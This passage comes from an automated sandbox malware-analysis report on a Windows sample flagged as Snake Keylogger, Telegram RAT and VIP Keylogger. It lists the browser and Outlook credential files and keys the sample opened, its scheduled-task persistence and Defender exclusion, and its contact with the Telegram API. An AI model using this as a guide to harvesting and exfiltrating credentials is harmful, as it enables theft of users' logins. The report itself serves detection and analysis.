                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeQueries volume information: C:\Users\user\AppData\Roaming\vQzHzddZ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3646802426.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3646332799.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000006.00000002.3646802426.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3646332799.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		311
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory23
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		Security Account Manager111
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634905 Sample: SecuriteInfo.com.Variant.La... Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 api.telegram.org 2->47 49 2 other IPs or domains 2->49 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 77 11 other signatures 2->77 8 SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe 7 2->8         started        12 vQzHzddZ.exe 5 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 73 Tries to detect the country of the analysis system (by using the IP) 45->73 75 Uses the Telegram API (likely for C&C communication) 47->75 process4 dnsIp5 37 C:\Users\user\AppData\Roaming\vQzHzddZ.exe, PE32 8->37 dropped 39 C:\Users\...\vQzHzddZ.exe:Zone.Identifier, ASCII 8->39 dropped 41 C:\Users\user\AppData\Local\...\tmpE4F1.tmp, XML 8->41 dropped 43 SecuriteInfo.com.V...16188.14077.exe.log, ASCII 8->43 dropped 79 Uses schtasks.exe or at.exe to add and modify task schedules 8->79 81 Writes to foreign memory regions 8->81 83 Allocates memory in foreign processes 8->83 85 Adds a directory exclusion to Windows Defender 8->85 17 powershell.exe 23 8->17         started        20 RegSvcs.exe 15 2 8->20         started        23 schtasks.exe 1 8->23         started        87 Antivirus detection for dropped file 12->87 89 Multi AV Scanner detection for dropped file 12->89 91 Injects a PE file into a foreign processes 12->91 25 RegSvcs.exe 12->25         started        27 schtasks.exe 12->27         started        59 127.0.0.1 unknown unknown 14->59 file6 signatures7 process8 dnsIp9 61 Loading BitLocker PowerShell Module 17->61 29 conhost.exe 17->29         started        31 WmiPrvSE.exe 17->31         started        51 api.telegram.org 149.154.167.220, 443, 49758, 49760 TELEGRAMRU United Kingdom 20->51 53 checkip.dyndns.com 158.101.44.242, 49715, 49720, 49724 ORACLE-BMC-31898US United States 20->53 55 reallyfreegeoip.org 104.21.16.1, 443, 49718, 49721 CLOUDFLARENETUS United States 20->55 33 conhost.exe 23->33         started        57 104.21.32.1, 443, 49737, 49739 CLOUDFLARENETUS United States 25->57 63 Tries to steal Mail credentials (via file / registry access) 25->63 65 Tries to harvest and steal browser information (history, passwords, etc) 25->65 35 conhost.exe 27->35         started        signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.